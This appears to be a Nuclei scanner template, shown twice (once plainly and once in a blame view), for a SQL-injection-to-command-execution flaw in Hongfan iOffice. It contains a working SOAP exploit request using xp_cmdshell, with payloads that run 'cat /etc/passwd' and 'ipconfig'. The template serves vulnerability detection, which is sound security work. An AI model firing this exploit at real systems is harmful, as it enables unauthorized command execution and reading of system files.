nuclei-templates/http/vulnerabilities/other/hongfan-ioffice-rce.yaml

id: hongfan-ioffice-rce

info:
  name: Hongfan OA ioAssistance.asmx - Remote Code Execution
  author: SleepingBag945
  severity: high
  description: |
    There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://github.com/FridaZhbk/pocscan/blob/main/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py
  metadata:
    fofa-query: app="红帆-ioffice"
    max-request: 2
    verified: true
  tags: hongfan,oa,sqli

http:
  - raw:
      - |
        POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
              <sql>exec master.dbo.xp_cmdshell '{{command}}'</sql>
            </GetLoginedEmpNoReadedInf>
          </soap:Body>
        </soap:Envelope>

    payloads:
      command:
        - '/bin/bash -c "cat /etc/passwd"'
        - 'cmd /c ipconfig'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "Windows IP"
          - "root:.*:0:0:"
        condition: or

      - type: word
        part: header
        words:
          - "text/xml"

      - type: status
        status:
          - 200
Create hongfan-ioffice-rce.yaml 2023-08-21 16:08:10 +00:00			`id: hongfan-ioffice-rce`

			`info:`
			`name: Hongfan OA ioAssistance.asmx - Remote Code Execution`
			`author: SleepingBag945`
			`severity: high`
			`description: \|`
			`There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.`
			`reference:`
			`- https://github.com/FridaZhbk/pocscan/blob/main/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py`
			`metadata:`
			`fofa-query: app="红帆-ioffice"`
TemplateMan Update [Tue Aug 22 08:13:27 UTC 2023] :robot: 2023-08-22 08:13:27 +00:00			`max-request: 2`
			`verified: true`
Create hongfan-ioffice-rce.yaml 2023-08-21 16:08:10 +00:00			`tags: hongfan,oa,sqli`

			`http:`
			`- raw:`
			`- \|`
			`POST /ioffice/prg/set/wss/ioAssistance.asmx HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml; charset=utf-8`

			`<?xml version="1.0" encoding="utf-8"?>`
			`<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`
			`<soap:Body>`
			`<GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">`
			`<sql>exec master.dbo.xp_cmdshell '{{command}}'</sql>`
			`</GetLoginedEmpNoReadedInf>`
			`</soap:Body>`
			`</soap:Envelope>`

			`payloads:`
			`command:`
			`- '/bin/bash -c "cat /etc/passwd"'`
			`- 'cmd /c ipconfig'`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "Windows IP"`
			`- "root:.*:0:0:"`
			`condition: or`

			`- type: word`
			`part: header`
			`words:`
fix code error 2023-08-21 16:11:27 +00:00			`- "text/xml"`
Create hongfan-ioffice-rce.yaml 2023-08-21 16:08:10 +00:00
			`- type: status`
			`status:`
			`- 200`